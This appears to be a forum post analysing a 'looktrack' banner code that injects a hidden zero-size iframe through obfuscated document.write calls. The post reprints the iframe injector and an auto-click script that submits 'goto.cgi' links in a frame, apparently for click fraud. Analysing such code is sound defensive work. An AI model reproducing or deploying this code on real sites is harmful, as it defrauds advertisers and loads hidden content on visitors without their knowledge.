CODE
<!--- start of looktrack code --->
<script LANGUAGE="JavaScript">
<!--
look_id="afei88";
//--></script>
<script
src="http://www.looktrack.com/view.php?ref=afei88"></script>
<!--- end of looktrack code --->
<script LANGUAGE="JavaScript">
<!--
look_id="afei88";
//--></script>
<script
src="http://www.looktrack.com/view.php?ref=afei88"></script>
<!--- end of looktrack code --->
You don't see the 0 iframe just by looking at that, you need to work on it.
http://www. looktrack.com/view.php?ref=afei88
The code is slightly obfuscated by using JS (the document.write codes at the beginning of the lines)
CODE
document.write("<body leftMargin=0 topMargin=0 marginwidth=0 marginheight=0>");
document.write("");
document.write("<table id='main_table_id' border=0 width=468 height='60' cellpadding='0' cellspacing='1' bgcolor='#336699'>");
document.write("<tr>");
document.write("<td id='td_1_ID' bgcolor='#FFFFFF' height='60' style=''>");
document.write("<a target=_blank href='http://www.looktrack.com/'>");
document.write("<img src='http://www.looktrack.com/images/gg.gif' style='border-width: 0' width=468 height=60 border=0></a></td>");
document.write("<if"+"ram"+"e"+" width=0 height=0"+" fr"+ "ameborder=0 marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no" +" src=http://" + "www.looktrack.com/portal.php?ref="+ look_id + "></"+"if"+"rame>");
document.write("</tr>");
document.write("</table>");
document.write("</body>");
document.write("");
document.write("<table id='main_table_id' border=0 width=468 height='60' cellpadding='0' cellspacing='1' bgcolor='#336699'>");
document.write("<tr>");
document.write("<td id='td_1_ID' bgcolor='#FFFFFF' height='60' style=''>");
document.write("<a target=_blank href='http://www.looktrack.com/'>");
document.write("<img src='http://www.looktrack.com/images/gg.gif' style='border-width: 0' width=468 height=60 border=0></a></td>");
document.write("<if"+"ram"+"e"+" width=0 height=0"+" fr"+ "ameborder=0 marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no" +" src=http://" + "www.looktrack.com/portal.php?ref="+ look_id + "></"+"if"+"rame>");
document.write("</tr>");
document.write("</table>");
document.write("</body>");
This gives a 0 iframe with the source www. looktrack.com/portal.php?ref=afei88, which means this portal is loading each time that original webpage with the looktrack.com code on it, though visually it may look like a genuine banner.
www. looktrack.com/portal.php?ref=afei88
uses framesets for the autosearching. It's a blank page for me but it's supposed to be an agrogo portal?
This is the code that controls the autosearch
CODE
<script language="JavaScript">
<!--
var sh;
sh=setInterval("MainFramLoad()",100)
function MainFramLoad()
{
for(z=0;z<parent.mainFrame.document.links.length;z++)
{
if(parent.mainFrame.document.links[z].href.indexOf('goto.cgi')>0)
{
clickObj(parent.mainFrame.document.links[z]);
z=parent.mainFrame.document.links.length;
clearInterval(sh);
}
}
}
function clickObj(o){
if(document.all)
{
o.click();
}
else
{
var radioButton = parent.mainFrame.document.createElement("form");
radioButton.setAttribute("action",o.href);
var pos = parent.mainFrame.document;
while (pos.lastChild.nodeType == 1) pos = pos.lastChild;
pos.parentNode.appendChild(radioButton);
radioButton.submit();
}
}
//-->
</script>
<!--
var sh;
sh=setInterval("MainFramLoad()",100)
function MainFramLoad()
{
for(z=0;z<parent.mainFrame.document.links.length;z++)
{
if(parent.mainFrame.document.links[z].href.indexOf('goto.cgi')>0)
{
clickObj(parent.mainFrame.document.links[z]);
z=parent.mainFrame.document.links.length;
clearInterval(sh);
}
}
}
function clickObj(o){
if(document.all)
{
o.click();
}
else
{
var radioButton = parent.mainFrame.document.createElement("form");
radioButton.setAttribute("action",o.href);
var pos = parent.mainFrame.document;
while (pos.lastChild.nodeType == 1) pos = pos.lastChild;
pos.parentNode.appendChild(radioButton);
radioButton.submit();
}
}
//-->
</script>
cross reference with mygole.com, feedwithus.com which both do the same trick
